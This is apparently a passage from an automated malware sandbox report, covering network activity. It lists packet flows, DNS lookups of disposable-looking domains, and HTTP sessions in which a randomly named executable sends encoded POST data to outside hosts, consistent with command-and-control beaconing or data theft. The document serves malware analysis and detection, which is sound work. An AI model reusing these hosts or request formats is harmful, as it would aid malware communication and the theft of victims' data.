                                                    Jan 13, 2025 09:36:00.348081112 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.348097086 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.348110914 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.348134041 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.348149061 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.348176003 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.349004030 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.349019051 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.349034071 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.349047899 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.349062920 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.349066019 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.349112988 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.349143028 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.349756956 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.351797104 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.351816893 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.351828098 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.352013111 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.551589012 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.551687956 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.551712036 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.551728010 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.551740885 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.551757097 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.551772118 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.551799059 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.551799059 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.551847935 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.551862955 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.551879883 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.551903963 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.551904917 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.551903963 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.551925898 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.551927090 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.551980972 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.552196980 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.552309990 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.552330017 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.552346945 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.552360058 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.552376032 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.552372932 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.552388906 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.552393913 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.552402973 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.552412033 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.552452087 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.552851915 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.552877903 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.552895069 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.552908897 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.552922964 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.552923918 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.552938938 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.552947998 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.552953959 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.552969933 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.552985907 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.553023100 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.553473949 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.553497076 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.553513050 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.553534031 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.553544998 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.553549051 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.553561926 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.553582907 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.553585052 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.553599119 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.553613901 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.553620100 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.553627014 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.553642988 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.553646088 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.553658009 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.553667068 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.553706884 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.554455042 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.554470062 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.554485083 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.554527998 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.554529905 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.554546118 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.554559946 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.554574966 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.554574966 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.554589987 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.554600954 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.554605007 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.554641008 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.609150887 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.756680965 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.756716013 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.756731987 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.756747007 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.756767988 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.756783009 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.756798029 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.756807089 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.756813049 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.756828070 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.756841898 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.756841898 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.756844044 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.756861925 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:00.756880045 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.756953001 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.782973051 CET5000980192.168.2.6192.186.58.31
                                                    Jan 13, 2025 09:36:00.787946939 CET8050009192.186.58.31192.168.2.6
                                                    Jan 13, 2025 09:36:06.372971058 CET5001080192.168.2.6104.21.16.1
                                                    Jan 13, 2025 09:36:06.377840042 CET8050010104.21.16.1192.168.2.6
                                                    Jan 13, 2025 09:36:06.377942085 CET5001080192.168.2.6104.21.16.1
                                                    Jan 13, 2025 09:36:06.398170948 CET5001080192.168.2.6104.21.16.1
                                                    Jan 13, 2025 09:36:06.403117895 CET8050010104.21.16.1192.168.2.6
                                                    Jan 13, 2025 09:36:07.298295975 CET8050010104.21.16.1192.168.2.6
                                                    Jan 13, 2025 09:36:07.298460960 CET8050010104.21.16.1192.168.2.6
                                                    Jan 13, 2025 09:36:07.298525095 CET5001080192.168.2.6104.21.16.1
                                                    Jan 13, 2025 09:36:07.905985117 CET5001080192.168.2.6104.21.16.1
                                                    Jan 13, 2025 09:36:08.925714970 CET5001180192.168.2.6104.21.16.1
                                                    Jan 13, 2025 09:36:08.930639029 CET8050011104.21.16.1192.168.2.6
                                                    Jan 13, 2025 09:36:08.930712938 CET5001180192.168.2.6104.21.16.1
                                                    Jan 13, 2025 09:36:08.946518898 CET5001180192.168.2.6104.21.16.1
                                                    Jan 13, 2025 09:36:08.952204943 CET8050011104.21.16.1192.168.2.6
                                                    Jan 13, 2025 09:36:09.838385105 CET8050011104.21.16.1192.168.2.6
                                                    Jan 13, 2025 09:36:09.839632988 CET8050011104.21.16.1192.168.2.6
                                                    Jan 13, 2025 09:36:09.839688063 CET5001180192.168.2.6104.21.16.1
                                                    Jan 13, 2025 09:36:10.452967882 CET5001180192.168.2.6104.21.16.1
                                                    Jan 13, 2025 09:36:11.471441984 CET5001280192.168.2.6104.21.16.1
                                                    Jan 13, 2025 09:36:11.476403952 CET8050012104.21.16.1192.168.2.6
                                                    Jan 13, 2025 09:36:11.476511002 CET5001280192.168.2.6104.21.16.1
                                                    Jan 13, 2025 09:36:11.491955042 CET5001280192.168.2.6104.21.16.1
                                                    Jan 13, 2025 09:36:11.496875048 CET8050012104.21.16.1192.168.2.6
                                                    Jan 13, 2025 09:36:11.496907949 CET8050012104.21.16.1192.168.2.6
                                                    Jan 13, 2025 09:36:12.416405916 CET8050012104.21.16.1192.168.2.6
                                                    Jan 13, 2025 09:36:12.416930914 CET8050012104.21.16.1192.168.2.6
                                                    Jan 13, 2025 09:36:12.416985035 CET5001280192.168.2.6104.21.16.1
                                                    Jan 13, 2025 09:36:12.999732018 CET5001280192.168.2.6104.21.16.1
                                                    Jan 13, 2025 09:36:14.018857956 CET5001380192.168.2.6104.21.16.1
                                                    Jan 13, 2025 09:36:14.023833990 CET8050013104.21.16.1192.168.2.6
                                                    Jan 13, 2025 09:36:14.023992062 CET5001380192.168.2.6104.21.16.1
                                                    Jan 13, 2025 09:36:14.033524036 CET5001380192.168.2.6104.21.16.1
                                                    Jan 13, 2025 09:36:14.038305044 CET8050013104.21.16.1192.168.2.6
                                                    Jan 13, 2025 09:36:14.943185091 CET8050013104.21.16.1192.168.2.6
                                                    Jan 13, 2025 09:36:14.943207979 CET8050013104.21.16.1192.168.2.6
                                                    Jan 13, 2025 09:36:14.943423033 CET5001380192.168.2.6104.21.16.1
                                                    Jan 13, 2025 09:36:14.944148064 CET8050013104.21.16.1192.168.2.6
                                                    Jan 13, 2025 09:36:14.944214106 CET5001380192.168.2.6104.21.16.1
                                                    Jan 13, 2025 09:36:14.946010113 CET5001380192.168.2.6104.21.16.1
                                                    Jan 13, 2025 09:36:14.950814009 CET8050013104.21.16.1192.168.2.6
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jan 13, 2025 09:34:22.845370054 CET5562753192.168.2.61.1.1.1
                                                    Jan 13, 2025 09:34:23.198744059 CET53556271.1.1.1192.168.2.6
                                                    Jan 13, 2025 09:34:39.156742096 CET5952853192.168.2.61.1.1.1
                                                    Jan 13, 2025 09:34:39.168798923 CET53595281.1.1.1192.168.2.6
                                                    Jan 13, 2025 09:34:52.317348957 CET5965453192.168.2.61.1.1.1
                                                    Jan 13, 2025 09:34:52.328912973 CET53596541.1.1.1192.168.2.6
                                                    Jan 13, 2025 09:35:07.176517010 CET6267853192.168.2.61.1.1.1
                                                    Jan 13, 2025 09:35:07.352412939 CET53626781.1.1.1192.168.2.6
                                                    Jan 13, 2025 09:35:21.644254923 CET6093353192.168.2.61.1.1.1
                                                    Jan 13, 2025 09:35:21.652771950 CET53609331.1.1.1192.168.2.6
                                                    Jan 13, 2025 09:35:29.706964016 CET5159853192.168.2.61.1.1.1
                                                    Jan 13, 2025 09:35:29.715720892 CET53515981.1.1.1192.168.2.6
                                                    Jan 13, 2025 09:35:37.769629002 CET5766453192.168.2.61.1.1.1
                                                    Jan 13, 2025 09:35:37.784902096 CET53576641.1.1.1192.168.2.6
                                                    Jan 13, 2025 09:35:51.144231081 CET6503453192.168.2.61.1.1.1
                                                    Jan 13, 2025 09:35:51.489020109 CET53650341.1.1.1192.168.2.6
                                                    Jan 13, 2025 09:36:05.800980091 CET5761353192.168.2.61.1.1.1
                                                    Jan 13, 2025 09:36:06.369585991 CET53576131.1.1.1192.168.2.6
                                                    Jan 13, 2025 09:36:19.956609011 CET5662553192.168.2.61.1.1.1
                                                    Jan 13, 2025 09:36:19.978338003 CET53566251.1.1.1192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 13, 2025 09:34:22.845370054 CET | 192.168.2.6 | 1.1.1.1 | 0xf33f | Standard query (0) | www.kx22368.shop | A (IP address) | IN (0x0001) | false
Jan 13, 2025 09:34:39.156742096 CET | 192.168.2.6 | 1.1.1.1 | 0x1420 | Standard query (0) | www.laduta.xyz | A (IP address) | IN (0x0001) | false
Jan 13, 2025 09:34:52.317348957 CET | 192.168.2.6 | 1.1.1.1 | 0xc834 | Standard query (0) | www.einpisalpace.shop | A (IP address) | IN (0x0001) | false
Jan 13, 2025 09:35:07.176517010 CET | 192.168.2.6 | 1.1.1.1 | 0xf4a8 | Standard query (0) | www.ripbgs.info | A (IP address) | IN (0x0001) | false
Jan 13, 2025 09:35:21.644254923 CET | 192.168.2.6 | 1.1.1.1 | 0x83da | Standard query (0) | www.0303588a47.buzz | A (IP address) | IN (0x0001) | false
Jan 13, 2025 09:35:29.706964016 CET | 192.168.2.6 | 1.1.1.1 | 0x1f0e | Standard query (0) | www.tizzles.tech | A (IP address) | IN (0x0001) | false
Jan 13, 2025 09:35:37.769629002 CET | 192.168.2.6 | 1.1.1.1 | 0x9629 | Standard query (0) | www.explorevision.xyz | A (IP address) | IN (0x0001) | false
Jan 13, 2025 09:35:51.144231081 CET | 192.168.2.6 | 1.1.1.1 | 0xacc9 | Standard query (0) | www.babyzhibo.net | A (IP address) | IN (0x0001) | false
Jan 13, 2025 09:36:05.800980091 CET | 192.168.2.6 | 1.1.1.1 | 0x3d71 | Standard query (0) | www.mzkd6gp5.top | A (IP address) | IN (0x0001) | false
Jan 13, 2025 09:36:19.956609011 CET | 192.168.2.6 | 1.1.1.1 | 0xc001 | Standard query (0) | www.potorooqr.lol | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 13, 2025 09:34:23.198744059 CET | 1.1.1.1 | 192.168.2.6 | 0xf33f | No error (0) | www.kx22368.shop | url.gname.net |  | CNAME (Canonical name) | IN (0x0001) | false
Jan 13, 2025 09:34:23.198744059 CET | 1.1.1.1 | 192.168.2.6 | 0xf33f | No error (0) | url.gname.net |  | 172.65.235.97 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 09:34:39.168798923 CET | 1.1.1.1 | 192.168.2.6 | 0x1420 | No error (0) | www.laduta.xyz |  | 192.64.119.109 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 09:34:52.328912973 CET | 1.1.1.1 | 192.168.2.6 | 0xc834 | No error (0) | www.einpisalpace.shop |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 09:34:52.328912973 CET | 1.1.1.1 | 192.168.2.6 | 0xc834 | No error (0) | www.einpisalpace.shop |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 09:35:07.352412939 CET | 1.1.1.1 | 192.168.2.6 | 0xf4a8 | No error (0) | www.ripbgs.info |  | 47.83.1.90 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 09:35:21.652771950 CET | 1.1.1.1 | 192.168.2.6 | 0x83da | Name error (3) | www.0303588a47.buzz | none | none | A (IP address) | IN (0x0001) | false
Jan 13, 2025 09:35:29.715720892 CET | 1.1.1.1 | 192.168.2.6 | 0x1f0e | Name error (3) | www.tizzles.tech | none | none | A (IP address) | IN (0x0001) | false
Jan 13, 2025 09:35:37.784902096 CET | 1.1.1.1 | 192.168.2.6 | 0x9629 | No error (0) | www.explorevision.xyz |  | 162.0.236.169 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 09:35:51.489020109 CET | 1.1.1.1 | 192.168.2.6 | 0xacc9 | No error (0) | www.babyzhibo.net |  | 192.186.58.31 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 09:36:06.369585991 CET | 1.1.1.1 | 192.168.2.6 | 0x3d71 | No error (0) | www.mzkd6gp5.top |  | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 09:36:06.369585991 CET | 1.1.1.1 | 192.168.2.6 | 0x3d71 | No error (0) | www.mzkd6gp5.top |  | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 09:36:06.369585991 CET | 1.1.1.1 | 192.168.2.6 | 0x3d71 | No error (0) | www.mzkd6gp5.top |  | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 09:36:06.369585991 CET | 1.1.1.1 | 192.168.2.6 | 0x3d71 | No error (0) | www.mzkd6gp5.top |  | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 09:36:06.369585991 CET | 1.1.1.1 | 192.168.2.6 | 0x3d71 | No error (0) | www.mzkd6gp5.top |  | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 09:36:06.369585991 CET | 1.1.1.1 | 192.168.2.6 | 0x3d71 | No error (0) | www.mzkd6gp5.top |  | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 09:36:06.369585991 CET | 1.1.1.1 | 192.168.2.6 | 0x3d71 | No error (0) | www.mzkd6gp5.top |  | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 09:36:19.978338003 CET | 1.1.1.1 | 192.168.2.6 | 0xc001 | No error (0) | www.potorooqr.lol |  | 127.0.0.1 | A (IP address) | IN (0x0001) | false

• www.kx22368.shop
• www.laduta.xyz
• www.einpisalpace.shop
• www.ripbgs.info
• www.explorevision.xyz
• www.babyzhibo.net
• www.mzkd6gp5.top
                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.649984172.65.235.97806688C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 13, 2025 09:34:23.221297979 CET515OUTGET /ca6n/?YFCLW=BxgTctSh&CviT=0h9Wf4Uk+EHtRoE9GYslXHc8OAVXToPYP42Hdey84aKhqV9wbfXJif0/+OnZ2BVp9cN120ZusPNi0A+xg/3t9NEZmf+IGJW1PRZ6E2m6SBA4aflrt404XQhuINrHqXgvx4ee6EU= HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.kx22368.shop
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                    Jan 13, 2025 09:34:24.093806028 CET | 302 | IN | HTTP/1.1 503 Service Temporarily Unavailable
                                                    Date: Mon, 13 Jan 2025 08:34:23 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: 2b02acc7f52abdc660a6aa29d2429c77=be1d67f97eb37e6653c4b92df79f54cb
                                                    Data Raw: 33 37 0d 0a 4c 6f 61 64 69 6e 67 20 69 6e 20 70 72 6f 67 72 65 73 73 2e 3c 73 63 72 69 70 74 3e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 22 3b 3c 2f 73 63 72 69 70 74 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 37Loading in progress.<script>location.href="";</script>0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    1 | 192.168.2.6 | 49988 | 192.64.119.109 | 80 | 6688 | C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 13, 2025 09:34:39.194005966 CET | 766 | OUT | POST /d89m/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.laduta.xyz
                                                    Origin: http://www.laduta.xyz
                                                    Referer: http://www.laduta.xyz/d89m/
                                                    Cache-Control: no-cache
                                                    Content-Length: 209
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                    Data Raw: 43 76 69 54 3d 39 4d 68 4e 67 45 52 67 66 48 52 43 47 4c 70 76 43 61 69 36 56 70 41 76 33 50 58 63 61 63 45 7a 31 54 56 4d 2b 4c 41 49 31 49 66 2f 63 6c 46 70 65 49 71 77 62 5a 5a 2b 38 36 4b 30 76 70 49 70 50 67 65 31 6a 73 39 46 42 6f 6c 79 32 6f 51 46 30 6a 75 59 4c 62 6a 4f 72 79 54 36 77 73 39 33 43 59 51 76 37 55 76 59 50 51 38 56 4a 57 6c 63 41 49 49 6f 74 6c 36 4d 59 57 4c 36 4e 4e 6e 52 36 42 37 4d 2b 6e 56 55 70 30 39 55 6c 70 48 4d 62 58 45 73 71 64 42 31 5a 52 4e 33 62 6b 52 33 67 7a 6e 34 77 59 61 78 58 4b 38 34 75 66 68 5a 5a 37 50 4b 70 6a 4f 62 39 56 49 4a 75 6b 6d 66 61 44 35 6c 75 31 49 32 6b 6e 6f 34
                                                    Data Ascii: CviT=9MhNgERgfHRCGLpvCai6VpAv3PXcacEz1TVM+LAI1If/clFpeIqwbZZ+86K0vpIpPge1js9FBoly2oQF0juYLbjOryT6ws93CYQv7UvYPQ8VJWlcAIIotl6MYWL6NNnR6B7M+nVUp09UlpHMbXEsqdB1ZRN3bkR3gzn4wYaxXK84ufhZZ7PKpjOb9VIJukmfaD5lu1I2kno4
                                                    Jan 13, 2025 09:34:39.665046930 CET | 193 | IN | HTTP/1.1 302 Found
                                                    Date: Mon, 13 Jan 2025 08:34:39 GMT
                                                    Content-Length: 0
                                                    Connection: close
                                                    Location: https://laduta.xyz/d89m
                                                    X-Served-By: Namecheap URL Forward
                                                    Server: namecheap-nginx


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    2 | 192.168.2.6 | 49989 | 192.64.119.109 | 80 | 6688 | C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 13, 2025 09:34:41.743571043 CET | 790 | OUT | POST /d89m/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.laduta.xyz
                                                    Origin: http://www.laduta.xyz
                                                    Referer: http://www.laduta.xyz/d89m/
                                                    Cache-Control: no-cache
                                                    Content-Length: 233
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                    Data Raw: 43 76 69 54 3d 39 4d 68 4e 67 45 52 67 66 48 52 43 48 72 35 76 4f 5a 36 36 63 70 41 75 70 66 58 63 55 38 45 33 31 54 5a 4d 2b 4b 45 59 32 39 33 2f 64 46 31 70 64 4a 71 77 63 5a 5a 2b 6f 71 4b 73 72 70 49 59 50 67 53 54 6a 74 52 46 42 72 5a 79 32 70 67 46 30 53 75 66 4c 4c 6a 4d 6a 53 54 34 74 63 39 33 43 59 51 76 37 55 71 46 50 51 30 56 4a 69 68 63 53 64 6b 70 79 56 36 4c 4f 6d 4c 36 4a 4e 6e 72 36 42 36 5a 2b 6d 35 75 70 32 46 55 6c 70 33 4d 62 43 77 72 68 64 41 2b 64 52 4d 47 66 6b 5a 35 74 6a 75 37 35 70 53 33 4b 6f 73 4f 69 4a 38 44 46 49 50 70 37 7a 75 5a 39 58 51 37 75 45 6d 31 59 44 42 6c 38 69 45 52 72 54 4e 62 59 2b 54 71 39 65 7a 58 39 50 51 32 57 48 4c 50 43 34 45 54 42 67 3d 3d
                                                    Data Ascii: CviT=9MhNgERgfHRCHr5vOZ66cpAupfXcU8E31TZM+KEY293/dF1pdJqwcZZ+oqKsrpIYPgSTjtRFBrZy2pgF0SufLLjMjST4tc93CYQv7UqFPQ0VJihcSdkpyV6LOmL6JNnr6B6Z+m5up2FUlp3MbCwrhdA+dRMGfkZ5tju75pS3KosOiJ8DFIPp7zuZ9XQ7uEm1YDBl8iERrTNbY+Tq9ezX9PQ2WHLPC4ETBg==
                                                    Jan 13, 2025 09:34:42.204600096 CET | 193 | IN | HTTP/1.1 302 Found
                                                    Date: Mon, 13 Jan 2025 08:34:42 GMT
                                                    Content-Length: 0
                                                    Connection: close
                                                    Location: https://laduta.xyz/d89m
                                                    X-Served-By: Namecheap URL Forward
                                                    Server: namecheap-nginx


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    3 | 192.168.2.6 | 49990 | 192.64.119.109 | 80 | 6688 | C:\Program Files (x86)\PKESJZZCXoBxkcCzIJnQEHEvcivxmEkFfYarLenCdJyyNjtaFRxPIAL\OlGIUOYUZW.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jan 13, 2025 09:34:44.289352894 CET | 1803 | OUT | POST /d89m/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.laduta.xyz
                                                    Origin: http://www.laduta.xyz
                                                    Referer: http://www.laduta.xyz/d89m/
                                                    Cache-Control: no-cache
                                                    Content-Length: 1245
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
